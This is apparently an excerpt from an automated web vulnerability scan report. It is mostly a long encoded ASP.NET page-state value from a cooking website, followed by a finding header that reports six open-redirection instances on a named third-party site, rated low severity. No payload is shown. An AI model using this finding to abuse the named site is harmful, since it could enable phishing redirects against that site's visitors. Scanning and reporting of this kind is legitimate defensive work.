BWUfAWhkZAIBDxUBDVNwZWNpYWwtRGlldHNkAgwPZBYCAgEPDxYGHwIFLGh0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL0hlYWx0aHkvTGl2ZS1XZWxsHwMFDG1lbnUtaGVhbHRoeR8EAgJkFgRmDw8WBB8FZR8BaGRkAgEPFQEJTGl2ZS1XZWxsZAIND2QWAgIBDw8WBh8CBTNodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9IZWFsdGh5LUNvb2tpbmctTWFnYXppbmUfAwUMbWVudS1oZWFsdGh5HwQCAmQWBGYPDxYCHwUFQGh0dHBzOi8vaW1hZ2VzLnJlaW1hbnB1Yi5jb20vVE9IL2ltYWdlcy9zaXRlL2ljb25zL2JsdWUtc3Rhci5wbmdkZAIBDxUBFEhlYWx0aHkgQ29va2luZyBQbHVzZAIOD2QWAgIBDw8WBh8CBSBodHRwOi8vY29tbXVuaXR5LnRhc3Rlb2Zob21lLmNvbR8DBQpIZWFkZXJNZW51HwQCAmQWBGYPDxYEHwVlHwFoZGQCAQ8VAQlDb21tdW5pdHlkAg8PZBYCAgEPDxYGHwIFJ2h0dHA6Ly9jb21tdW5pdHkudGFzdGVvZmhvbWUuY29tL0ZvcnVtcx8DBQ5tZW51LWNvbW11bml0eR8EAgJkFgRmDw8WBB8FZR8BaGRkAgEPFQEGRm9ydW1zZAIQD2QWAgIBDw8WBh8CBSdodHRwOi8vY29tbXVuaXR5LnRhc3Rlb2Zob21lLmNvbS9Hcm91cHMfAwUObWVudS1jb21tdW5pdHkfBAICZBYEZg8PFgQfBWUfAWhkZAIBDxUBBkdyb3Vwc2QCEQ9kFgICAQ8PFgYfAgUmaHR0cDovL2NvbW11bml0eS50YXN0ZW9maG9tZS5jb20vQmxvZ3MfAwUObWVudS1jb21tdW5pdHkfBAICZBYEZg8PFgQfBWUfAWhkZAIBDxUBBUJsb2dzZAISD2QWAgIBDw8WBh8CBTNodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9jb21tdW5pdHkvY29va3Mtd2hvLWNhcmUfAwUObWVudS1jb21tdW5pdHkfBAICZBYEZg8PFgQfBWUfAWhkZAIBDxUBDkNvb2tzIFdobyBDYXJlZAITD2QWAgIBDw8WBh8CBR1odHRwOi8vdmlkZW9zLnRhc3Rlb2Zob21lLmNvbR8DBQpIZWFkZXJNZW51HwQCAmQWBGYPDxYEHwVlHwFoZGQCAQ8VAQZWaWRlb3NkAhQPZBYCAgEPDxYGHwIFI2h0dHA6Ly92aWRlb3MudGFzdGVvZmhvbWUuY29tL3dhdGNoHwMFCm1lbnUtdmlkZW8fBAICZBYEZg8PFgQfBWUfAWhkZAIBDxUBCVBsYXlsaXN0c2QCFQ9kFgICAQ8PFgYfAgUkaHR0cDovL3ZpZGVvcy50YXN0ZW9maG9tZS5jb20vc2VhcmNoHwMFCm1lbnUtdmlkZW8fBAICZBYEZg8PFgQfBWUfAWhkZAIBDxUBDVNlYXJjaCBWaWRlb3NkAhYPZBYCAgEPDxYGHwIFJWh0dHA6Ly92aWRlb3MudGFzdGVvZmhvbWUuY29tL3B1Ymxpc2gfAwUKbWVudS12aWRlbx8EAgJkFgRmDw8WBB8FZR8BaGRkAgEPFQENU3VibWl0IFZpZGVvc2QCFw9kFgICAQ8PFgYfAgUhaHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vVmlkZW9zHwMFCm1lbnUtdmlkZW8fBAICZBYEZg8PFgQfBWUfAWhkZAIBDxUBFFRhc3RlIG9mIEhvbWUgVmlkZW9zZAIYD2QWAgIBDw8WBh8CBSpodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9Db29raW5nLVNjaG9vbHMfAwUKSGVhZGVyTWVudR8EAgJkFgRmDw8WBB8FZR8BaGRkAgEPFQEPQ29va2luZyBTY2hvb2xzZAIZD2QWAgIBDw8WBh8CBUFodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9BYm91dC10aGUtVGFzdGUtb2YtSG9tZS1Db29raW5nLVNjaG9vbB8DBRNtZW51LWNvb2tpbmctc2Nob29sHwQCAmQWBGYPDxYEHwVlHwFoZGQCAQ8VAQhBYm91dCBVc2QCGg9kFgICAQ8PFgYfAgU3aHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vQ29va2luZy1TY2hvb2xzL0ZpbmQtYS1DbGFzcx8DBRNtZW51LWNvb2tpbmctc2Nob29sHwQCAmQWBGYPDxYEHwVlHwFoZGQCAQ8VAQtGaW5kIGEgU2hvd2QCGw9kFgICAQ8PFgYfAgU5aHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vQ29va2luZy1TY2hvb2xzL01lZXQtT3VyLVN0YWZmHwMFE21lbnUtY29va2luZy1zY2hvb2wfBAICZBYEZg8PFgQfBWUfAWhkZAIBDxUBDk1lZXQgT3VyIFN0YWZmZAIcD2QWAgIBDw8WBh8CBT5odHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9Db29raW5nLVNjaG9vbHMvQ29va2luZy1TY2hvb2wtRkFRcx8DBRNtZW51LWNvb2tpbmctc2Nob29sHwQCAmQWBGYPDxYEHwVlHwFoZGQCAQ8VAQRGQVFzZAIdD2QWAgIBDw8WBh8CBSNodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9Db250ZXN0cx8DBQpIZWFkZXJNZW51HwQCAmQWBGYPDxYEHwVlHwFoZGQCAQ8VAQhDb250ZXN0c2QCHg9kFgICAQ8PFgYfAgUvaHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vQ29udGVzdHMvSGlkZS0tLVNlZWsfAwUNbWVudS1jb250ZXN0cx8EAgJkFgRmDw8WBB8FZR8BaGRkAgEPFQELSGlkZSAmIFNlZWtkAh8PZBYCAgEPDxYGHwIFMGh0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL0NvbnRlc3RzL1NhbmR5LXMtV2FuZB8DBQ1tZW51LWNvbnRlc3RzHwQCAmQWBGYPDxYEHwVlHwFoZGQCAQ8VAQ5TYW5keeKAmXMgV2FuZGQCIA9kFgICAQ8PFgYfAgUzaHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vQ29udGVzdHMvQ2FycmllLXMtQ2Fycm90HwMFDW1lbnUtY29udGVzdHMfBAICZBYEZg8PFgQfBWUfAWhkZAIBDxUBEUNhcnJpZeKAmXMgQ2Fycm90ZAIhD2QWAgIBDw8WBh8CBTpodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9Db250ZXN0cy9XaGVyZS1zLXRoZS1XaGlzay5hc3B4HwMFDW1lbnUtY29udGVzdHMfBAICZBYEZg8PFgQfBWUfAWhkZAIBDxUBE1doZXJl4oCZcyB0aGUgV2hpc2tkAiIPZBYCAgEPDxYGHwIFM2h0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL0NvbnRlc3RzL1JlY2lwZS1Db250ZXN0cx8DBQ1tZW51LWNvbnRlc3RzHwQCAmQWBGYPDxYEHwVlHwFoZGQCAQ8VAQ9SZWNpcGUgQ29udGVzdHNkAiMPZBYCAgEPDxYGHwIFR2h0dHA6Ly93d3cuc2hvcHRhc3Rlb2Zob21lLmNvbS9Db29rYm9va3MvQ0JLLGRlZmF1bHQsc2MuaHRtbD9yZWZ1cmw9MTcyHwMFCkhlYWRlck1lbnUfBAICZBYEZg8PFgQfBWUfAWhkZAIBDxUBCUNvb2tib29rc2QCJA9kFgICAQ8PFgYfAgVPaHR0cDovL3d3dy5zaG9wdGFzdGVvZmhvbWUuY29tL1Rhc3RlLW9mLUhvbWUvQ0JLX1RPSCxkZWZhdWx0LHNjLmh0bWw/cmVmdXJsPTE3Mh8DBQltZW51LXNob3AfBAICZBYEZg8PFgQfBWUfAWhkZAIBDxUBDVRhc3RlIG9mIEhvbWVkAiUPZBYCAgEPDxYGHwIFU2h0dHA6Ly93d3cuc2hvcHRhc3Rlb2Zob21lLmNvbS9CYWtpbmctKy1EZXNzZXJ0cy9DQktfQktFLGRlZmF1bHQsc2MuaHRtbD9yZWZ1cmw9MTcyHwMFCW1lbnUtc2hvcB8EAgJkFgRmDw8WBB8FZR8BaGRkAgEPFQERQmFraW5nICYgRGVzc2VydHNkAiYPZBYCAgEPDxYGHwIFTmh0dHA6Ly93d3cuc2hvcHRhc3Rlb2Zob21lLmNvbS9GYW1pbHktU3R5bGUvQ0JLX0ZBTSxkZWZhdWx0LHNjLmh0bWw/cmVmdXJsPTE3Mh8DBQltZW51LXNob3AfBAICZBYEZg8PFgQfBWUfAWhkZAIBDxUBDEZhbWlseSBTdHlsZWQCJw9kFgICAQ8PFgYfAgVNaHR0cDovL3d3dy5zaG9wdGFzdGVvZmhvbWUuY29tL0tpdGNoZW4tR2FkZ2V0cy9LSVQsZGVmYXVsdCxzYy5odG1sP3JlZnVybD0xNzIfAwUJbWVudS1zaG9wHwQCAmQWBGYPDxYEHwVlHwFoZGQCAQ8VAQ9LaXRjaGVuIEdhZGdldHNkAigPZBYCAgEPDxYGHwIFRmh0dHA6Ly93d3cuc2hvcHRhc3Rlb2Zob21lLmNvbS9Db29rd2FyZS9DS1csZGVmYXVsdCxzYy5odG1sP3JlZnVybD0xNzIfAwUJbWVudS1zaG9wHwQCAmQWBGYPDxYEHwVlHwFoZGQCAQ8VAQhDb29rd2FyZWQCKQ9kFgICAQ8PFgYfAgUqaHR0cDovL3d3dy5zaG9wdGFzdGVvZmhvbWUuY29tLz1yZWZ1cmw9MTcyHwMFCW1lbnUtc2hvcB8EAgJkFgRmDw8WBB8FZR8BaGRkAgEPFQEHTW9yZS4uLmQCKg9kFgICAQ8PFgYfAgUkaHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vTWFnYXppbmVzHwMFCkhlYWRlck1lbnUfBAICZBYEZg8PFgQfBWUfAWhkZAIBDxUBCU1hZ2F6aW5lc2QCKw9kFgICAQ8PFgYfAgUfaHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vUGx1cx8DBQltZW51LXBsdXMfBAICZBYEZg8PFgIfBQVAaHR0cHM6Ly9pbWFnZXMucmVpbWFucHViLmNvbS9UT0gvaW1hZ2VzL3NpdGUvaWNvbnMvYmx1ZS1zdGFyLnBuZ2RkAgEPFQESVGFzdGUgb2YgSG9tZSBQbHVzZAIsD2QWAgIBDw8WBh8CBTZodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9TaW1wbGUtLS1EZWxpY2lvdXMtTWFnYXppbmUfAwUJbWVudS1wbHVzHwQCAmQWBGYPDxYCHwUFQGh0dHBzOi8vaW1hZ2VzLnJlaW1hbnB1Yi5jb20vVE9IL2ltYWdlcy9zaXRlL2ljb25zL2JsdWUtc3Rhci5wbmdkZAIBDxUBF1NpbXBsZSAmIERlbGljaW91cyBQbHVzZAItD2QWAgIBDw8WBh8CBTNodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9IZWFsdGh5LUNvb2tpbmctTWFnYXppbmUfAwUJbWVudS1wbHVzHwQCAmQWBGYPDxYCHwUFQGh0dHBzOi8vaW1hZ2VzLnJlaW1hbnB1Yi5jb20vVE9IL2ltYWdlcy9zaXRlL2ljb25zL2JsdWUtc3Rhci5wbmdkZAIBDxUBFEhlYWx0aHkgQ29va2luZyBQbHVzZAIEDw8WAh4MZmVhdHVyZUNvdW50ZmRkAg8PZBYOZg9kFgJmD2QWAgIBDw8WAh8FBT5odHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9pbWFnZXMvc2l0ZS90b2hfbG9nb193ZWItZm9vdGVyLmdpZmRkAgEPDxYCHwYCAWQWEgIED2QWAmYPFQQ0aHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vSW5mby0tQWJvdXQtVGFzdGUtb2YtSG9tZQhBYm91dCBVcwRfdG9wCEFib3V0IFVzZAIFD2QWAmYPFQQfaHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vSGVscARIZWxwBF90b3AESGVscGQCBg9kFgJmDxUEJWh0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL1ByZXNzLVJvb20KUHJlc3MgUm9vbQRfdG9wClByZXNzIFJvb21kAgcPZBYCZg8VBCNodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9tZWRpYWtpdAtBZHZlcnRpc2luZwRfdG9wC0FkdmVydGlzaW5nZAIID2QWAmYPFQQoaHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vdGFzdHktdGlkYml0cw1UYXN0eSBUaWRiaXRzBF90b3ANVGFzdHkgVGlkYml0c2QCCQ9kFgJmDxUEPGh0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL0luZm8tLUNvbnRhY3QtVXMtYXQtVGFzdGUtb2YtSG9tZQpDb250YWN0IFVzBF90b3AKQ29udGFjdCBVc2QCCg9kFgJmDxUEImh0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL1NpdGVtYXAIU2l0ZSBNYXAEX3RvcAhTaXRlIE1hcGQCCw9kFgJmDxUENWh0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL0luZm8tLVRlcm1zLWFuZC1Db25kaXRpb25zElRlcm1zICYgQ29uZGl0aW9ucwRfdG9wElRlcm1zICYgQ29uZGl0aW9uc2QCDA9kFgJmDxUEL2h0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL0luZm8tLVByaXZhY3ktUG9saWN5DlByaXZhY3kgUG9saWN5BF90b3AOUHJpdmFjeSBQb2xpY3lkAgIPDxYCHwYCAWQWGAICD2QWAmYPFQEUVGFzdGUgb2YgSG9tZSBGYW1pbHlkAgQPZBYCZg8VBDNodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9IZWFsdGh5LUNvb2tpbmctTWFnYXppbmUPSGVhbHRoeSBDb29raW5nBF90b3APSGVhbHRoeSBDb29raW5nZAIFD2QWAmYPFQQ0aHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vU2ltcGxlLURlbGljaW91cy1NYWdhemluZRJTaW1wbGUgJiBEZWxpY2lvdXMEX3RvcBJTaW1wbGUgJiBEZWxpY2lvdXNkAgYPZBYCZg8VBEdodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9SZWNpcGVzL1B1YmxpY2F0aW9uL0Nvb2tpbmctZm9yLVR3by1tYWdhemluZQ1Db29raW5nIGZvciAyBF90b3ANQ29va2luZyBmb3IgMmQCBw9kFgJmDxUEI2h0dHA6Ly93d3cuY291bnRyeXdvbWFubWFnYXppbmUuY29tDUNvdW50cnkgV29tYW4GX2JsYW5rDUNvdW50cnkgV29tYW5kAggPZBYCZg8VBFRodHRwOi8vd3d3LnNob3B0YXN0ZW9maG9tZS5jb20vY29va2Jvb2tzLWZyb20tc2hvcC10YXN0ZS1vZi1ob21lL0NCSyxkZWZhdWx0LHNjLmh0bWwJQ29va2Jvb2tzBl9ibGFuawlDb29rYm9va3NkAgkPZBYCZg8VBDdodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9TaWduLVVwLUZvci1GcmVlLU5ld3NsZXR0ZXJzC05ld3NsZXR0ZXJzBF90b3ALTmV3c2xldHRlcnNkAgoPZBYCZg8VBCtodHRwOi8vd3d3LnNob3B0YXN0ZW9maG9tZS5jb20vP3JlZnVybD1JMTEyElNob3AgVGFzdGUgb2YgSG9tZQZfYmxhbmsSU2hvcCBUYXN0ZSBvZiBIb21lZAILD2QWAmYPFQQqaHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vQ29va2luZy1TY2hvb2xzHVRhc3RlIG9mIEhvbWUgQ29va2luZyBTY2hvb2xzBF90b3AdVGFzdGUgb2YgSG9tZSBDb29raW5nIFNjaG9vbHNkAgwPZBYCZg8VBBhodHRwOi8vd3d3LnJlaW1hbnB1Yi5jb20TUmVpbWFuIFB1YmxpY2F0aW9ucwZfYmxhbmsTUmVpbWFuIFB1YmxpY2F0aW9uc2QCDQ9kFgJmDxUEGmh0dHA6Ly93d3cucmRhLmNvbS9jYXJlZXJzDUNhcmVlciBDZW50ZXIGX2JsYW5rDUNhcmVlciBDZW50ZXJkAg4PZBYCZg8VBBFodHRwOi8vd3d3LnJkLmNvbQ5SZWFkZXJzIERpZ2VzdAZfYmxhbmsPUmVhZGVyJ3MgRGlnZXN0ZAIDDw8WAh8GAgFkFg4CAg9kFgJmDxUBDVJlY2lwZSBGaW5kZXJkAgQPZBYCZg8VBCpodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9TZWFyY2gvQWR2YW5jZWQNUmVjaXBlIFNlYXJjaARfdG9wDVJlY2lwZSBTZWFyY2hkAgUPZBYCZg8VBCpodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9TZWFyY2gvQWR2YW5jZWQPQWR2YW5jZWQgU2VhcmNoBF90b3APQWR2YW5jZWQgU2VhcmNoZAIGD2QWAmYPFQQiaHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vUmVjaXBlcw5Ccm93c2UgUmVjaXBlcwRfdG9wDkJyb3dzZSBSZWNpcGVzZAIHD2QWAmYPFQQsaHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vUmVjaXBlcy9BZGQvP3NiPU0PU3VibWl0IGEgUmVjaXBlBF90b3APU3VibWl0IGEgUmVjaXBlZAIID2QWAmYPFQQqaHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vUmVjaXBlLUNvbnRlc3RzD1JlY2lwZSBDb250ZXN0cwRfdG9wD1JlY2lwZSBDb250ZXN0c2QCCQ9kFgJmDxUEHmh0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL1JTUwtSU1MgUmVjaXBlcwRfdG9wPTxpbWcgc3JjPSIvaW1hZ2VzL3NpdGUvUlNTLmdpZiIgYWx0PSJSU1MiIGJvcmRlcj0iMCI+IFJlY2lwZXNkAgQPDxYCHwYCAWQWOgICD2QWAmYPFQEVUmVjaXBlIENhdGVnb3J5IEluZGV4ZAIED2QWAmYPFQQ0aHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vUmVjaXBlcy9Db3Vyc2UvQXBwZXRpemVycwpBcHBldGl6ZXJzBF90b3AKQXBwZXRpemVyc2QCBQ9kFgJmDxUEM2h0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL1JlY2lwZXMvQ291cnNlL0JldmVyYWdlcwlCZXZlcmFnZXMEX3RvcAlCZXZlcmFnZXNkAgYPZBYCZg8VBDdodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9SZWNpcGVzL0NvdXJzZS9CcmVhZC1SZWNpcGVzDUJyZWFkIFJlY2lwZXMEX3RvcA1CcmVhZCBSZWNpcGVzZAIHD2QWAmYPFQQ7aHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vUmVjaXBlcy9Db3Vyc2UvQnJlYWtmYXN0LVJlY2lwZXMRQnJlYWtmYXN0IFJlY2lwZXMEX3RvcBFCcmVha2Zhc3QgUmVjaXBlc2QCCA9kFgJmDxUEPmh0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL1JlY2lwZXMvSW5ncmVkaWVudHMvQ2hpY2tlbi1SZWNpcGVzD0NoaWNrZW4gUmVjaXBlcwRfdG9wD0NoaWNrZW4gUmVjaXBlc2QCCQ9kFgJmDxUEMmh0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL1JlY2lwZXMvV2lubmluZy1SZWNpcGVzD1dpbm5pbmcgUmVjaXBlcwRfdG9wD1dpbm5pbmcgUmVjaXBlc2QCCg9kFgJmDxUEOGh0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL1JlY2lwZXMvQ291cnNlL0Rpbm5lci1SZWNpcGVzDkRpbm5lciBSZWNpcGVzBF90b3AORGlubmVyIFJlY2lwZXNkAgsPZBYCZg8VBDJodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9SZWNpcGVzL0NvdXJzZS9EZXNzZXJ0cwhEZXNzZXJ0cwRfdG9wCERlc3NlcnRzZAIMD2QWAmYPFQRCaHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vUmVjaXBlcy9TZWFzb25hbC1SZWNpcGVzL1NwcmluZy1SZWNpcGVzDlNwcmluZyBSZWNpcGVzBF90b3AOU3ByaW5nIFJlY2lwZXNkAg0PZBYCZg8VBE9odHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9SZWNpcGVzL0hvbGlkYXktLS1DZWxlYnJhdGlvbi1SZWNpcGVzL0Vhc3Rlci1SZWNpcGVzDkVhc3RlciBSZWNpcGVzBF90b3AORWFzdGVyIFJlY2lwZXNkAg4PZBYCZg8VBFZodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9SZWNpcGVzL0hvbGlkYXktLS1DZWxlYnJhdGlvbi1SZWNpcGVzL0NpbmNvLWRlLU1heW8tUmVjaXBlcxVDaW5jbyBkZSBNYXlvIFJlY2lwZXMEX3RvcBVDaW5jbyBkZSBNYXlvIFJlY2lwZXNkAg8PZBYCZg8VBFVodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9SZWNpcGVzL0hvbGlkYXktLS1DZWxlYnJhdGlvbi1SZWNpcGVzL01vdGhlci1zLURheS1SZWNpcGVzE01vdGhlcnMgRGF5IFJlY2lwZXMEX3RvcBRNb3RoZXIncyBEYXkgUmVjaXBlc2QCEA9kFgJmDxUEVWh0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL1JlY2lwZXMvSG9saWRheS0tLUNlbGVicmF0aW9uLVJlY2lwZXMvTWVtb3JpYWwtRGF5LVJlY2lwZXMUTWVtb3JpYWwgRGF5IFJlY2lwZXMEX3RvcBRNZW1vcmlhbCBEYXkgUmVjaXBlc2QCEQ9kFgJmDxUEVWh0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL1JlY2lwZXMvSG9saWRheS0tLUNlbGVicmF0aW9uLVJlY2lwZXMvRmF0aGVyLXMtRGF5LVJlY2lwZXMTRmF0aGVycyBEYXkgUmVjaXBlcwRfdG9wFEZhdGhlcidzIERheSBSZWNpcGVzZAISD2QWAmYPFQRRaHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vUmVjaXBlcy9Ib2xpZGF5LS0tQ2VsZWJyYXRpb24tUmVjaXBlcy9KdWx5LTR0aC1SZWNpcGVzEEp1bHkgNHRoIFJlY2lwZXMEX3RvcBBKdWx5IDR0aCBSZWNpcGVzZAITD2QWAmYPFQRFaHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vQ29tbXVuaXR5L0Nvb2tzLVdoby1DYXJlL0Jha2UtU2FsZS1SZWNpcGVzEUJha2UgU2FsZSBSZWNpcGVzBF90b3ARQmFrZSBTYWxlIFJlY2lwZXNkAhQPZBYCZg8VBDpodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9SZWNpcGVzL0N1aXNpbmUvSXRhbGlhbi1SZWNpcGVzD0l0YWxpYW4gUmVjaXBlcwRfdG9wD0l0YWxpYW4gUmVjaXBlc2QCFQ9kFgJmDxUEQGh0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL1JlY2lwZXMvQ29va2luZy1TdHlsZS9Qb3RsdWNrLVJlY2lwZXMPUG90bHVjayBSZWNpcGVzBF90b3APUG90bHVjayBSZWNpcGVzZAIWD2QWAmYPFQRCaHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vUmVjaXBlcy9IZWFsdGh5LUVhdGluZy9EaWFiZXRpYy1SZWNpcGVzEERpYWJldGljIFJlY2lwZXMEX3RvcBBEaWFiZXRpYyBSZWNpcGVzZAIXD2QWAmYPFQREaHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vUmVjaXBlcy9Db29raW5nLVN0eWxlL1Nsb3ctQ29va2VyLVJlY2lwZXMTU2xvdyBDb29rZXIgUmVjaXBlcwRfdG9wE1Nsb3cgQ29va2VyIFJlY2lwZXNkAhgPZBYCZg8VBDBodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9SZWNpcGVzL0NvdXJzZS9TYWxhZHMGU2FsYWRzBF90b3AGU2FsYWRzZAIZD2QWAmYPFQQ0aHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vUmVjaXBlcy9Db3Vyc2UvU2FuZHdpY2hlcwpTYW5kd2ljaGVzBF90b3AKU2FuZHdpY2hlc2QCGg9kFgJmDxUEO2h0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL1JlY2lwZXMvQ291cnNlL1NpZGUtRGlzaC1SZWNpcGVzEVNpZGUgRGlzaCBSZWNpcGVzBF90b3ARU2lkZSBEaXNoIFJlY2lwZXNkAhsPZBYCZg8VBDZodHRwOi8vd3d3LnRhc3Rlb2Zob21lLmNvbS9SZWNpcGVzL0NvdXJzZS9Tb3VwLVJlY2lwZXMMU291cCBSZWNpcGVzBF90b3AMU291cCBSZWNpcGVzZAIcD2QWAmYPFQQ8aHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vUmVjaXBlcy9Db3Vyc2UvVmVnZXRhcmlhbi1SZWNpcGVzElZlZ2V0YXJpYW4gUmVjaXBlcwRfdG9wElZlZ2V0YXJpYW4gUmVjaXBlc2QCHQ9kFgJmDxUEQWh0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL1JlY2lwZXMvQ29va2luZy1TdHlsZS9HcmlsbGluZy1SZWNpcGVzEEdyaWxsaW5nIFJlY2lwZXMEX3RvcBBHcmlsbGluZyBSZWNpcGVzZAIeD2QWAmYPFQQpaHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vVG9wLTEwLVJlY2lwZXMOVG9wIDEwIFJlY2lwZXMEX3RvcA5Ub3AgMTAgUmVjaXBlc2QCHw9kFgJmDxUELmh0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL1JlY2lwZXMvSG93LVRvLUNvb2sLSG93IHRvIENvb2sEX3RvcAtIb3cgdG8gQ29va2QCBQ8PFgIfBgIBZBYMAgIPZBYCZg8VARpIZWFsdGh5IExpdmluZyBhbmQgQ29va2luZ2QCBA9kFgJmDxUEM2h0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL0hlYWx0aHkvUmVjaXBlLU1ha2VvdmVycxBSZWNpcGUgTWFrZW92ZXJzBF90b3AQUmVjaXBlIE1ha2VvdmVyc2QCBQ9kFgJmDxUEMGh0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL0hlYWx0aHkvSGVhbHRoeS1NZW51cw1IZWFsdGh5IE1lbnVzBF90b3ANSGVhbHRoeSBNZW51c2QCBg9kFgJmDxUEMGh0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL0hlYWx0aHkvU3BlY2lhbC1EaWV0cxRTcGVjaWFsIERpZXQgUmVjaXBlcwRfdG9wFFNwZWNpYWwgRGlldCBSZWNpcGVzZAIHD2QWAmYPFQQsaHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vSGVhbHRoeS9MaXZlLVdlbGwJTGl2ZSBXZWxsBF90b3AJTGl2ZSBXZWxsZAIID2QWAmYPFQQzaHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vSGVhbHRoeS1Db29raW5nLU1hZ2F6aW5lFEhlYWx0aHkgQ29va2luZyBQbHVzBF90b3AUSGVhbHRoeSBDb29raW5nIFBsdXNkAgkPZBYCZg9kFghmD2QWAmYPDxYEHgRUZXh0BQdNeSBQYWdlHwIFd2h0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tL0FjY2Vzcy9sb2dpbi5hc3B4P1JldHVyblVSTD0vUGFnZU5vdEZvdW5kLmFzcHg/NDA0O2h0dHA6Ly93d3cudGFzdGVvZmhvbWUuY29tOjgwL2Zhdmljb24uaWNvFgIeB29uY2xpY2sFOHRyYWNrTGluaygnRm9vdGVyJywnTXkgUGFnZScsJy9wYWdlbm90Zm91bmQuYXNweCcsdHJ1ZSk7ZAIBD2QWAmYPDxYEHwcFBE1haWwfAgV5aHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vQWNjZXNzL2xvZ2luLmFzcHg/UmV0dXJuVVJMPWh0dHA6Ly9jb21tdW5pdHkudGFzdGVvZmhvbWUuY29tL3VzZXIvUHJpdmF0ZU1lc3NhZ2VzL2RlZmF1bHQuYXNweBYCHwgFNXRyYWNrTGluaygnRm9vdGVyJywnTWFpbCcsJy9wYWdlbm90Zm91bmQuYXNweCcsdHJ1ZSk7ZAICD2QWAmYPDxYEHwcFCk15IFByb2ZpbGUfAgV3aHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vQWNjZXNzL2xvZ2luLmFzcHg/UmV0dXJuVVJMPS9QYWdlTm90Rm91bmQuYXNweD80MDQ7aHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb206ODAvZmF2aWNvbi5pY28WAh8IBTt0cmFja0xpbmsoJ0Zvb3RlcicsJ015IFByb2ZpbGUnLCcvcGFnZW5vdGZvdW5kLmFzcHgnLHRydWUpO2QCAw9kFgJmDw8WBB8HBQZMb2cgSW4fAgV3aHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb20vQWNjZXNzL2xvZ2luLmFzcHg/UmV0dXJuVVJMPS9QYWdlTm90Rm91bmQuYXNweD80MDQ7aHR0cDovL3d3dy50YXN0ZW9maG9tZS5jb206ODAvZmF2aWNvbi5pY28WAh8IBTd0cmFja0xpbmsoJ0Zvb3RlcicsJ0xvZyBJbicsJy9wYWdlbm90Zm91bmQuYXNweCcsdHJ1ZSk7ZGQ=" />
...[SNIP]...
12. Open redirection  previous  next
There are 6 instances of this issue:

12.1. http://www.lalate.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
